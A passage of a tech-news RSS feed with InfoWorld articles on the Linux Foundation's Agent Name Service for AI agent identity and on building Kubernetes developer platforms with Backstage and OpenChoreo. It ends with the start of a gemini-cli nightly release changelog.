<p>To bypass these security concerns, enterprises should complement ANS with <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">IAM</a>, workload identity, AI gateways, and API security controls, according to Prakash.</p>



<p>The Foundation, though, argues that DNS alone is not intended to serve as the sole trust mechanism inside ANS and the framework supports Decentralized Identifiers (DIDs) and Legal Entity Identifiers (LEIs), allowing enterprises to tie agents to existing digital and organizational identity systems as part of the broader identity verification model.</p>



<h2 class="wp-block-heading">Battle of the standards</h2>



<p>Even so, ANS is entering an increasingly crowded ecosystem of standards and frameworks that enable and govern enterprise AI agents.</p>



<p>While protocols such as <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a> and <a href="https://www.infoworld.com/article/4088217/what-is-a2a-how-the-agent-to-agent-protocol-enables-autonomous-collaboration.html">A2A</a> focus on connecting agents to tools and facilitating communication between each other, the Foundation itself hosts two standards that touch on agent identity, discovery, and trust.</p>



<p>One of them is <a href="https://www.infoworld.com/article/4178820/dns-aid-will-make-ai-agents-easier-to-discover-says-linux-foundation.html">DNS-AI Discovery (DNS-AID)</a>, a proposed framework that uses DNS records to help agents advertise their capabilities and make themselves discoverable across networks. Another is <a href="https://www.networkworld.com/article/4029803/cisco-donates-ai-agent-tech-to-linux-foundation.html">AGNTCY</a>, a Cisco-led project that aims to provide a broader infrastructure stack for multi-agent systems, including capabilities for agent discovery, identity, messaging, and observability.</p>



<p>That raises the possibility of fragmentation if competing approaches evolve in parallel.</p>



<p>However, Prakash pointed out that the presence of multiple similar frameworks that touch on agent trust, identity, and discovery shows that the agent infrastructure market has entered its standards discovery phase, not its standards consolidation phase.</p>



<p>“Overlap in discovery, identity, messaging, and observability is expected at this stage,” Prakash said.</p>



<p>Enterprises, thus, the analyst added, should wait for “clarity and clearer interoperability guidance” before they treat any one initiative as strategic infrastructure.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Linux Foundation project aims to bring DNS-style trust to AI agents]]></title>
<description><![CDATA[As enterprises deploy increasing numbers of AI agents across applications and organizations, the Linux Foundation on Wednesday announced plans to launch a new Agent Name Service framework designed to establish identity, ownership, and trust for these systems.



The ANS framework, which is expect...]]></description>
<link>https://tsecurity.de/de/3624291/it-nachrichten/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624291/it-nachrichten/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents/</guid>
<pubDate>Thu, 25 Jun 2026 13:32:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises deploy increasing numbers of AI agents across applications and organizations, the Linux Foundation on Wednesday announced plans to launch a new Agent Name Service framework designed to establish identity, ownership, and trust for these systems.</p>



<p>The <a href="https://github.com/agentnameservice" target="_blank" rel="noreferrer noopener">ANS framework</a>, which is expected to allow systems and users to verify who an agent represents, what permissions it has, and whether its code and operational history remain authentic and unchanged, will be based on the existing <a href="https://www.networkworld.com/article/965540/what-is-dns-and-how-does-it-work.html" target="_blank">Domain Name System (DNS)</a>, the Foundation said in a statement.</p>



<p>Just like DNS translates human-readable website names into internet addresses, ANS aims to create a standardized naming and discovery layer for AI agents, with the ability for enterprises to publish agent identities through domains they already control, enabling other agents and systems to verify who an agent represents and discover information about its capabilities and ownership before interacting with it, it added.</p>



<p>This, the Foundation further added, creates a federated mechanism for agent discovery and verification without any reliance on any proprietary registry or centralized control.</p>



<h2 class="wp-block-heading">Growing demand for an agent identity framework</h2>



<p>ANS solves an emerging problem for enterprises, especially in scaling AI deployments, said <a href="https://www.forrester.com/analyst-bio/charlie-dai/BIO5344" target="_blank" rel="noreferrer noopener">Charlie Dai</a>, principal analyst at Forrester, too. “The agent identity problem is already emerging in early production deployments, particularly where multiple agents interact across tools, APIs, and organizational boundaries without consistent authentication and accountability models,” he said.</p>



<p>“We have seen growing concerns around provenance, authorization scoping, and auditability in agent-to-agent interactions, especially in regulated industries and multi-vendor environments,” Dai said.</p>



<p>Agent identity has become a more critical concern for enterprises, pointed out <a href="https://www.gartner.com/en/experts/jaishiv-prakash" target="_blank" rel="noreferrer noopener">Jaishiv Prakash</a>, director analyst at Gartner: “Agent identity has moved from an architectural consideration to an operational control-plane gap.”</p>



<p>“The evidence we see from enterprise clients is consistent: they need to know which agent acted, who it represented, what authority it had, and whether its runtime behavior matched its intended design,” Prakash said.</p>



<p>Beyond the problem ANS seeks to solve, analysts also said the framework’s architecture could prove equally important for enterprise adoption.</p>



<p>“For enterprises, one of ANS’s biggest advantages may be its reliance on DNS, especially since they already use it to manage domains and trust. It avoids creating a new registry and lets companies publish and verify agent identities using existing internet infrastructure, making adoption easier and cheaper,” said <a href="https://pareekh.com/about/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, principal analyst at Pareekh Consulting.</p>



<p>More so because enterprises don’t have to build anything new, according to <a href="https://www.linkedin.com/in/znamit?originalSubdomain=in" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p>However, there are downsides to being built on DNS, especially on the security front, Dai cautioned.</p>



<p>“DNS was not originally designed for high-assurance identity. This will make it susceptible to spoofing, hijacking, and latency or propagation inconsistencies that can undermine trust guarantees,” Dai said.</p>



<p>To bypass these security concerns, enterprises should complement ANS with <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">IAM</a>, workload identity, AI gateways, and API security controls, according to Prakash.</p>



<p>The Foundation, though, argues that DNS alone is not intended to serve as the sole trust mechanism inside ANS and the framework supports Decentralized Identifiers (DIDs) and Legal Entity Identifiers (LEIs), allowing enterprises to tie agents to existing digital and organizational identity systems as part of the broader identity verification model.</p>



<h2 class="wp-block-heading">Battle of the standards</h2>



<p>Even so, ANS is entering an increasingly crowded ecosystem of standards and frameworks that enable and govern enterprise AI agents.</p>



<p>While protocols such as <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a> and <a href="https://www.infoworld.com/article/4088217/what-is-a2a-how-the-agent-to-agent-protocol-enables-autonomous-collaboration.html">A2A</a> focus on connecting agents to tools and facilitating communication between each other, the Foundation itself hosts two standards that touch on agent identity, discovery, and trust.</p>



<p>One of them is <a href="https://www.infoworld.com/article/4178820/dns-aid-will-make-ai-agents-easier-to-discover-says-linux-foundation.html">DNS-AI Discovery (DNS-AID)</a>, a proposed framework that uses DNS records to help agents advertise their capabilities and make themselves discoverable across networks. Another is <a href="https://www.networkworld.com/article/4029803/cisco-donates-ai-agent-tech-to-linux-foundation.html">AGNTCY</a>, a Cisco-led project that aims to provide a broader infrastructure stack for multi-agent systems, including capabilities for agent discovery, identity, messaging, and observability.</p>



<p>That raises the possibility of fragmentation if competing approaches evolve in parallel.</p>



<p>However, Prakash pointed out that the presence of multiple similar frameworks that touch on agent trust, identity, and discovery shows that the agent infrastructure market has entered its standards discovery phase, not its standards consolidation phase.</p>



<p>“Overlap in discovery, identity, messaging, and observability is expected at this stage,” Prakash said.</p>



<p>Enterprises, thus, the analyst added, should wait for “clarity and clearer interoperability guidance” before they treat any one initiative as strategic infrastructure.</p>



<p><em>The article originally appeared on <a href="https://www.infoworld.com/article/4189361/new-linux-foundation-project-aims-to-bring-dns-style-trust-to-ai-agents.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Building a state-of-the-art development platform with Backstage]]></title>
<description><![CDATA[Key takeaways




Backstage solved the portal problem, not the platform problem. A portal organizes catalogs, documentation, and templates. A platform owns deployments, environments, policies, and runtime operations. Backstage assumes that the execution layer exists beneath it.



Point-to-point ...]]></description>
<link>https://tsecurity.de/de/3623951/ai-nachrichten/building-a-state-of-the-art-development-platform-with-backstage/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623951/ai-nachrichten/building-a-state-of-the-art-development-platform-with-backstage/</guid>
<pubDate>Thu, 25 Jun 2026 11:34:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>Backstage solved the portal problem, not the platform problem. A portal organizes catalogs, documentation, and templates. A platform owns deployments, environments, policies, and runtime operations. Backstage assumes that the execution layer exists beneath it.</li>



<li>Point-to-point integrations become a maintenance burden. Many organizations end up with a “messy middle” where Backstage is connected directly to <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD</a>, <a href="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html" data-type="link" data-id="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html">GitOps</a>, <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html" data-type="link" data-id="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>, and <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html" data-type="link" data-id="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a> tools through custom wiring that’s fragile and hard to evolve.</li>



<li>Abstractions are the interface between developers and infrastructure. Developers work with components, endpoints, and dependencies. Platform engineers work with environments, pipelines, and component types. The platform compiles both into Kubernetes resources.</li>



<li>A control plane bridges the gap. It sits between the portal and runtime, compiling abstractions into infrastructure, enforcing policies consistently, reconciling drift, and aggregating runtime state back to the portal.</li>



<li>Good abstractions enable advanced capabilities. Unified observability, automated guardrails, and AI agents that can reason about and act on your platform. All becomes possible when you have well-defined concepts and a control plane that understands both sides.</li>
</ul>



<p>…</p>



<h2 class="wp-block-heading">Start with Backstage</h2>



<p>If you’re building an <a href="https://www.infoworld.com/article/2263059/what-is-an-internal-developer-platform-paas-done-your-way.html" data-type="link" data-id="https://www.infoworld.com/article/2263059/what-is-an-internal-developer-platform-paas-done-your-way.html">internal developer platform</a>, Backstage is certainly part of your architecture. It solved the discovery problem and became the default choice for developer portals.</p>



<p>Before Backstage, developers navigated wikis, spreadsheets, and tribal knowledge just to find who owned a service or how to spin up a new one. Backstage brought structure: a unified catalog, a plugin ecosystem, and golden-path templates that actually got adopted.</p>



<p><a href="https://github.com/backstage/backstage" data-type="link" data-id="https://github.com/backstage/backstage">Backstage</a> is a Cloud Native Computing Foundation (CNCF) project with one of the most active contributor communities in the ecosystem. When organizations evaluate developer portals, Backstage is the starting point.</p>



<p>However, many teams discover something after deployment: Backstage provides a portal, not a platform. A portal organizes information. A platform owns execution: deployments, environments, policies, observability, and runtime operations.</p>



<p>Backstage assumes that the execution layer exists beneath it. That layer is where most of the complexity lives, and it’s what this article is about.</p>



<h2 class="wp-block-heading"><a></a>What a developer platform actually is</h2>



<p>A developer platform or an internal developer platform is a self-service framework you build to help developers build, deploy, and manage applications independently.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_01_developer_platform.png" alt="Image_01_developer_platform" class="wp-image-4189088" width="1024" height="307" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>Most organizations already have an organically grown version of this:</p>



<ul class="wp-block-list">
<li>Developer commits code</li>



<li>CI pipeline builds and pushes images to a registry</li>



<li>Pipeline updates a GitOps repo containing Helm charts or Kubernetes manifests</li>



<li>Argo CD or Flux syncs those manifests to clusters</li>
</ul>



<p>You may have this workflow running today. The question is whether it’s a pipeline stitched together with scripts and tribal knowledge, or a platform with consistent abstractions and self-service capabilities.</p>



<h2 class="wp-block-heading"><a></a>What usually happens after adopting Backstage</h2>



<p>How do you add Backstage to this setup? The common approach is for developers to maintain Backstage entity files (primarily component and API entities) alongside the source code. Then you configure the built-in entity provider in Backstage to scan source code repositories to populate the catalog. Eventually, you’ll end up with a portal with all your systems, components, APIs, and other resources. So far, so good.</p>



<p>Once developers start using the portal, you’ll be hit with a consistent flow of feature requests:</p>



<ul class="wp-block-list">
<li>“I see my component in the catalog, but is it actually running?” You configure the Kubernetes plugin and link components to their corresponding manifests. Now developers can see pod status, deployment state, and replica counts.</li>



<li>“I need logs, metrics, and traces related to my component.” You integrate your observability stack or developers context-switch to Grafana, Datadog, or whatever you’re running. Either way, more wiring.</li>



<li>“Can I create new components from here?” You build Backstage templates that scaffold repos with the right structure, Backstage entities, Helm charts, and CI pipelines, all of which encode your organization’s best practices. Now you’re maintaining golden paths in templates, separately from the runtime configuration that actually enforces them.</li>
</ul>



<p>Each request is reasonable and achievable, but they add up.</p>



<h2 class="wp-block-heading"><a></a>The messy middle</h2>



<p>Eventually, you end up with a platform held together by point-to-point connections. Every new capability requires new wiring. Every upgrade risks breaking something. You spend more time maintaining integrations than building features.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_02_messy_middle.png" alt="Image_02_messy_middle" class="wp-image-4189092" width="1024" height="893" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>You would never design a production system with this many point-to-point dependencies. Why accept it for your platform?</p>



<h2 class="wp-block-heading"><a></a>Treat the platform as a product, but also as a system</h2>



<p>Organically grown systems get you started, but once you commit to Backstage as your portal, you need a product mindset. Start from developer experience, understand their pain points, then design a system that addresses them coherently.</p>



<p>A platform is also a system. Approach it the way you would approach any production system you’re building. You wouldn’t design a back-end service without thinking about separation of concerns, clear interfaces, and extensibility.</p>



<p>The same principles apply here:</p>



<ul class="wp-block-list">
<li>Separation of concerns: Don’t mix developer-facing abstractions with infrastructure implementation. Keep them separate so you can evolve each independently.</li>



<li>Clear interfaces: Define explicit abstractions. Developers and platform engineers should interact with well-defined concepts rather than implementation details scattered across Helm charts and CI scripts.</li>



<li>Extensibility: Requirements keep changing. If every new capability requires custom wiring, you’ll spend more time maintaining than improving. Design for extension from the start.</li>
</ul>



<p>The difference between a pile of integrations and a platform is architecture. Get the system design right, and new capabilities slot in cleanly. Get it wrong, and every feature request becomes a maintenance burden.</p>



<h2 class="wp-block-heading">The missing layer beneath Backstage</h2>



<p>Moving from an organically grown pipeline to an actionable developer platform is a big leap. You probably have CI/CD pipelines that work, a Kubernetes cluster running workloads, and a Backstage catalog describing what exists.</p>



<p>The questions are:</p>



<ul class="wp-block-list">
<li>How do you transform an informational portal into one with a platform under the hood?</li>



<li>How do you bridge the gap between what the catalog describes and what’s actually running?</li>



<li>How do you enforce golden paths beyond initial scaffolding?</li>



<li>How do you design a platform that evolves with your organization’s needs?</li>
</ul>



<p>What’s missing is a connective layer between Backstage and your runtime, something that makes the portal operational rather than just informational. Let’s look at the key architectural elements to consider when designing that layer and the whole platform.</p>



<h2 class="wp-block-heading"><a></a>Start with abstractions</h2>



<p>One of the main goals of a developer platform is to reduce cognitive load. The platform should meet developers where they are and speak their language, not Kubernetes’.</p>



<p>Every organization has its own vocabulary, but the Backstage system model is a good starting point. It may not cover everything, but you can extend it with custom entities. The key is that developers work with high-level concepts while the platform compiles them into Kubernetes resources. Developers are abstracted away from the underlying details, but they can still see what’s happening underneath.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Concept</strong></td><td><strong>Description</strong></td><td><strong>Backstage mapping</strong></td></tr><tr><td>Project</td><td>A cloud-native application composed of multiple components. It is also a unit of isolation.</td><td>System</td></tr><tr><td>Component</td><td>A deployable unit, such as web services, APIs, workers, or scheduled tasks.</td><td>Component</td></tr><tr><td>Endpoint</td><td>A network-accessible interface exposed by a component. </td><td>API</td></tr><tr><td>Resource</td><td>External infrastructure such as databases, queues, and caches.</td><td>Resource</td></tr><tr><td>Dependency</td><td>A component’s reliance on endpoints or resources.</td><td>consumesAPI, dependsOn</td></tr></tbody></table> </div></figure>



<p>These are not just static abstractions; they also have associated runtime semantics. The following diagram illustrates runtime representations of these concepts.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_03_cell_diagram.png" alt="Image_03_cell_diagram" class="wp-image-4189100" width="1024" height="905" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<p>In the workload cluster, a project becomes an isolation boundary for all of its components. The platform translates this into Kubernetes namespaces and network policies that enforce the boundary, not just document it.</p>



<p>Endpoint visibility determines which endpoints can talk to which. A project-scoped endpoint gets network policies that block traffic from outside the project. An organization-scoped endpoint is exposed to internal traffic but remains behind the internal gateway. An external endpoint gets routed through the public gateway with appropriate authentication. Developers declare visibility; the platform generates the policies.</p>



<p>Dependencies work the same way. When a component declares a dependency on an endpoint, the platform injects the URL and other environment variables required to connect to the dependency. It configures the network policies for both directions, egress from the calling endpoint and ingress to the target endpoint. Without the declared dependency, egress is blocked by default. The dependency graph you see above reflects actual permitted traffic flow, not just intended relationships.</p>



<h2 class="wp-block-heading"><a></a>You need platform abstractions, too</h2>



<p>Developer abstractions help your developers. Platform abstractions help you.</p>



<p>While developers work with components, endpoints, and dependencies, you need a different vocabulary to design and operate the platform itself. These abstractions let you and your team define standards, enforce policies, and create structure without writing low-level configurations for every scenario.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>Concept</strong></td><td><strong>Description</strong></td></tr><tr><td>Namespace</td><td>A logical grouping of users and resources, typically aligned to a company, business unit, or team. Defines ownership and access boundaries.</td></tr><tr><td>Data plane</td><td>A Kubernetes cluster that hosts one or more deployment environments. You can have multiple data planes for isolation, regional distribution, or scaling.</td></tr><tr><td>Environment</td><td>A runtime context, such as dev, test, staging, or prod, where workloads are deployed and executed. Environments carry their own policies and resource configurations.</td></tr><tr><td>Pipeline</td><td>A defined process that governs how work, such as builds, deployments, promotions, or any automated workflows, flows through the platform. Encodes your operational processes as a platform primitive.</td></tr><tr><td>Component type</td><td>Defines a category of workload—Service, Worker, Cron, Job.</td></tr><tr><td>Trait</td><td>A reusable capability that attaches to any component, such as autoscaling, resilience, observability, and security policies. Compose behaviors without duplicating configuration.</td></tr></tbody></table> </div></figure>



<p>These abstractions separate platform concerns from application concerns. Developers don’t need to know which cluster their code runs on or how environments are wired together. They deploy to “staging” or “prod,” and you define what those terms mean.</p>



<h2 class="wp-block-heading"><a></a>The missing layer is a control plane</h2>



<p>The control plane is where abstractions become real. It sits between the portal and your workload clusters, translating developer intent into infrastructure configuration.</p>



<p>You can think of it as a compiler that targets Kubernetes clusters, converting higher-level abstractions into what Kubernetes and its underlying frameworks understand. It can also apply platform-wide rules during this compilation. Resource limits, security requirements, etc., can be enforced consistently, not merely documented and hoped for.</p>



<p>But compilation is only half the job. The control plane also reconciles continuously. It monitors drift between the declared and actual states. When they diverge, it corrects. Your abstractions remain the source of truth; the control plane enforces them over time.</p>



<h2 class="wp-block-heading"><a></a>Programmability is not optional</h2>



<p>One of the key aspects of this control plane is programmability. If you want your platform to evolve, the control plane needs to be extensible. Different teams have different requirements. New capabilities emerge. You can’t anticipate everything up front.</p>



<p>This means allowing customization of how abstractions compile to Kubernetes manifests. But extensibility without guardrails is dangerous. You need programmability that preserves your invariants. The goal is constrained flexibility, open enough to evolve, structured enough to stay coherent.</p>



<h2 class="wp-block-heading"><a></a>Observable abstractions make the portal useful</h2>



<p>The control plane also aggregates runtime state and associates it with your abstractions. This is what makes the portal useful. Without this, developers piece together information from different tools: Kubernetes dashboard for pod status, Argo CD for the deployment state, Grafana for metrics, Jaeger for traces. Each tool knows part of the story; none shows the full picture.</p>



<p>With the control plane aggregating state, the portal tells a connected story. When a developer opens a component page in Backstage, they see:</p>



<ul class="wp-block-list">
<li>Deployed environments and their status</li>



<li>Current replicas and resource usage</li>



<li>Recent deployments and who triggered them</li>



<li>Logs, metrics, and traces that are scoped to that component, in each environment</li>



<li>Dependencies and their health</li>
</ul>



<p>No context-switching. No reconstructing which pod belongs to which service in which cluster. The abstraction is the anchor; everything else attaches to it.</p>



<p>This only works because the control plane understands both sides. It compiled the abstractions to Kubernetes, so it knows how to map runtime data back. Information flows in both directions. Downward: developer intent flows through the control plane and becomes running workloads. Upward: runtime state flows back through the control plane and appears in the portal.</p>



<p>This is what makes the portal actionable. It’s not just displaying information; it’s connected to a system that can act.</p>



<h2 class="wp-block-heading"><a></a>Data plane: keep it simple</h2>



<p>The data plane is where your workloads actually run. In most cases, this means one or more Kubernetes clusters. The data plane doesn’t know about your abstractions. It understands Kubernetes primitives such as pods, deployments, services, and ingresses. The control plane’s job is to compile your higher-level concepts into these primitives and apply them.</p>



<p>The data plane does one thing: it runs what the control plane tells it to run. The intelligence lives in the control plane; the execution happens in the data plane.</p>



<h2 class="wp-block-heading">Where AI fits into the platform</h2>



<p>AI is now part of every platform conversation, but the architectural question is where it actually belongs.</p>



<p>The abstractions and control plane you’ve built create the foundation. You have well-defined concepts such as components, endpoints, and dependencies. You have a runtime state aggregated and tied to those concepts. You have a connected view of your system. AI agents can definitely leverage this.</p>



<h3 class="wp-block-heading"><a></a>Agents as platform users</h3>



<p>AI agents should be able to interact with your platform as first-class participants. This requires exposing platform capabilities through interfaces that agents can use, such as <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers, APIs with clear semantics, user-friendly CLIs, and skills that map to platform operations.</p>



<p>These capabilities of the platform enable agents to create components, trigger builds and deployments, query environment status, and reason about dependencies. They help you and your developers become more productive.</p>



<h3 class="wp-block-heading"><a></a>Agents as platform capabilities</h3>



<p>You can also embed agents inside your platform to help your teams’ day-to-day operations. Here are some examples of agents you can develop:</p>



<ul class="wp-block-list">
<li>SRE agents: Analyze logs, metrics, and traces to surface likely root causes. Instead of developers digging through dashboards, the agent correlates signals and suggests where to look.</li>



<li>FinOps agents: Help teams understand and optimize resource costs across environments and components.</li>



<li>Architect agents: Assist with system design decisions, such as dependency analysis, capacity planning, and migration impact assessment.</li>
</ul>



<p>These agents work because they have access to the control plane’s unified view. They see abstractions, runtime state, and observability data in one place, the same connected story developers see in the portal.</p>



<p>The pattern holds. Good abstractions make everything easier, including AI.</p>



<h2 class="wp-block-heading"><a></a>OpenChoreo as a reference implementation</h2>



<p><a href="https://github.com/openchoreo/openchoreo" data-type="link" data-id="https://github.com/openchoreo/openchoreo">OpenChoreo</a> is an open-source developer platform for Kubernetes. It was recently accepted into the CNCF as a sandbox project. OpenChoreo implements the architecture described in this article: developer abstractions backed by a control plane, a Backstage-powered portal, integrated CI/CD and GitOps, and observability wired to your abstractions.</p>



<p>If you’re building this architecture yourself, OpenChoreo is worth studying as a reference, even if you don’t adopt it directly. The project demonstrates how these pieces fit together: how abstractions compile into Kubernetes resources, how runtime state flows back to the portal, and how guardrails are enforced during compilation.</p>



<p>You can use OpenChoreo as a complete platform, or install its Backstage plugins into your existing portal and use just the control plane layer. Either way, the underlying patterns are what matter. The architecture is the idea. OpenChoreo is one way to implement it.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/image_04_multi_plane_architecture.png?w=1024" alt="image_04_multi_plane_architecture" class="wp-image-4189109" width="1024" height="552" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<h2 class="wp-block-heading">A useful mental model: multi-plane architecture</h2>



<p>OpenChoreo separates concerns across five planes:</p>



<ol class="wp-block-list">
<li>Experience plane: Where developers, platform engineers, and SREs interact with the platform via the Backstage-powered portal, CLI, GitOps, or AI agents.</li>



<li>Control plane: The brain that translates high-level abstractions (components, APIs, environments, pipelines) into Kubernetes manifests. Programmable through component types and traits, so you can extend it without forking or writing low-level controllers. Continuously reconciles the runtime state back into those abstractions.</li>



<li>Data plane: Where workloads run. Enforces the semantics of your abstractions, such as project isolation, traffic policies, and security boundaries. These aren’t just configurations; the platform guarantees them.</li>



<li>Observability plane: Feeds metrics, logs, and traces back through the same abstractions developers already understand, requiring no translation.</li>



<li>Workflow plane (optional): Handles builds using Cloud Native Buildpacks and Argo Workflows by default.</li>
</ol>



<p>These planes work together but remain separate concerns. You can reason about each independently, evolve them at different rates, and deploy them flexibly: a single cluster with namespace isolation for dev/test, fully separated multi-cluster setups for production, or hybrid topologies that colocate planes like Control and CI for cost efficiency.</p>



<h2 class="wp-block-heading"><a></a>AI and OpenChoreo</h2>



<p>OpenChoreo is being built to treat AI agents as first-class participants. In OpenChoreo 1.0, external agents can interact with the platform via MCP servers, agent skills, or the CLI to generate and edit component configurations, reason about releases and environments, and more. The built-in SRE Agent is a first example of this. It analyzes logs, metrics, and traces from your deployments and uses LLMs to surface likely root causes and actionable insights.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Image_05_external_internal_agents_openchoreo.png?w=1024" alt="Image_05_external_internal_agents_openchoreo" class="wp-image-4189115" width="1024" height="584" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">WSO2</p></div>



<h2 class="wp-block-heading">From portal to platform</h2>



<p>Backstage solved the portal problem. It gave you a unified interface for catalogs, documentation, and golden paths. But a portal isn’t a platform. There’s a gap between what developers see and what’s actually running, and that’s where you get stuck. You fill it with point-to-point integrations, custom plugins, and scripts that become their own maintenance burden.</p>



<p>The pattern that works is portal, control plane, data plane: </p>



<ul class="wp-block-list">
<li>A portal that gives developers ready access to catalogs, documentation, and templates.</li>



<li>A control plane that compiles platform abstractions, reconciles drift, and aggregates runtime state.</li>



<li>A data plane that runs workloads and enforces guarantees.</li>
</ul>



<p>Whether you build this yourself or you adopt something like OpenChoreo, the architecture matters more than the tools. Get the layers right, and new capabilities slot in cleanly. Get them wrong, and every feature request becomes a project.</p>



<p>Backstage gives you the front door. The real platform begins behind it.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v0.49.0-nightly.20260625.gd845bc5d4]]></title>
<description><![CDATA[What's Changed

fix(cli): prevent path traversal vulnerabilities during skill install… by @ompatel-aiml in #27767
Fix/pending tools and trust overrides by @jvargassanchez-dot in #27854
ci: use internal environment for scheduled nightly releases (#27865) by @rmedranollamas in #27939
feat(core): Su...]]></description>
<link>https://tsecurity.de/de/3623194/downloads/release-v0490-nightly20260625gd845bc5d4/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623194/downloads/release-v0490-nightly20260625gd845bc5d4/</guid>
<pubDate>Thu, 25 Jun 2026 03:46:37 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>fix(cli): prevent path traversal vulnerabilities during skill install… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ompatel-aiml/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ompatel-aiml">@ompatel-aiml</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4625379514" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27767" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27767/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27767">#27767</a></li>
<li>Fix/pending tools and trust overrides by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jvargassanchez-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jvargassanchez-dot">@jvargassanchez-dot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4644413103" data-permission-text="Title is private" data-url="https://github.com/google-gemini/gemini-cli/issues/27854" data-hovercard-type="pull_request" data-hovercard-url="/google-gemini/gemini-cli/pull/27854/hovercard" href="https://github.com/google-gemini/gemini-cli/pull/27854">#27854</a></li>
